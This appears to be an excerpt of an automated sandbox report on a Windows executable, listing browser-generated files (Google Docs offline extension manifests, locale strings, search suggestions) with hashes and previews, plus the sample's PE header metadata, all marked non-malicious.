                                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (836)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):841
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.180365365053369
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:VB7WsaBEhBHslgT9lCuABAT4T4uoB7HHHHHHHYqmffffffo:VVNaCKlgZ01BAMT4uSEqmffffffo
                                                                                                                                                                                                                                                                                          MD5:0D6C1D199FADFF2172B235A2250389CE
                                                                                                                                                                                                                                                                                          SHA1:2344E61C38D6597F40DE152CBDFEFC008EBF2B36
                                                                                                                                                                                                                                                                                          SHA-256:D5F7B9EF39AC0C86038D6D32695086EB5F1F774B58E938BBAABFB29C22C82FB5
                                                                                                                                                                                                                                                                                          SHA-512:E108AD59763CCDC4E95E5779CD1AF13B763990509D9A676A73B9289A9829CB1651AAF4B1A8F1A8860FEBED6390730F6CE737116A5CD22021EAFACA69D1F7C966
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["aries daily horoscope today","helldivers killzone crossover","penn state nebraska volleyball game","soundhound ai stock","western washington power outages","auburn johni broome injury","anora streaming date","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-6601595147070906387,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.9837880587523955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:O0NBGsn:O0NBx
                                                                                                                                                                                                                                                                                          MD5:8A6CE39DB421A86CB2DF95F014512E5A
                                                                                                                                                                                                                                                                                          SHA1:CD7B2080B48D555199735D0B9988C8AD4941A534
                                                                                                                                                                                                                                                                                          SHA-256:8B8A7AEA5C77277DFE1FF4D5CCBB4010933C7289DD9B48D856C4E234F3021662
                                                                                                                                                                                                                                                                                          SHA-512:430C500BA71E511052422162751B7E678ADB82CC3484389D7A6BEC24490BAFDA0106EE057C4F552F5F511310C2E8F4924D278DC49815370EED0A4764B2BEB4D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                          Preview:.....jr..I.4...e)..R..9..c...F.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):132732
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.436726191054436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:fEkJQ7O4N5dTm+syHEt4W3XdQ4Q6HuSr/nUW2i6o:fBQ7HTt/sHdQ4Q6HDfUW8o
                                                                                                                                                                                                                                                                                          MD5:B75613F7A68C3B12372A04C4CFC04949
                                                                                                                                                                                                                                                                                          SHA1:9FDCF8FF3578735B7162F97422115F8D361629A1
                                                                                                                                                                                                                                                                                          SHA-256:830DE5C10CDDD15DF362ED4D96251366FD711FC20D2E87A858089DF992821D87
                                                                                                                                                                                                                                                                                          SHA-512:16BE44214F2AD6B8FC2D18F74AFF3F63397FB97DA0E158560DADA019DDBF6A977C393A571BEB4C50A1D1464042F61EA9934BF96BB4C40D6E8520E74CFC716282
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9729852136228745
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                          File name:pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File size:899'095 bytes
                                                                                                                                                                                                                                                                                          MD5:c5f715f9eefa5e42fd10fc3b6e90953b
                                                                                                                                                                                                                                                                                          SHA1:92ae82a3ce9799e2af542597f9edb94c4ef1d6c5
                                                                                                                                                                                                                                                                                          SHA256:f5ad3ca6464635488824c3e5b6284ca263e7c6417ec854692d839a1c008d5e23
                                                                                                                                                                                                                                                                                          SHA512:1335f65b2019421b8fb1a706dba5dd33e3b2c43685d9b6f2bb8656c4097e1f7281358ad4d0ef87620fe2efa9ea5c00af10cba22e9c7a3c6f0049292518207175
                                                                                                                                                                                                                                                                                          SSDEEP:24576:S3BBt7zXHyaroKgT3yniH3Vn/WsNGJ2S5mFZIb8jJ61IHic:Eo9CniHl+sNu54gUKK
                                                                                                                                                                                                                                                                                          TLSH:FA152397EEC86D06EAD30E7034F0B6156F32B6201A75D6AFD358C65D3EA06825C2C376
                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                          Icon Hash:3673c1c96933035f
                                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
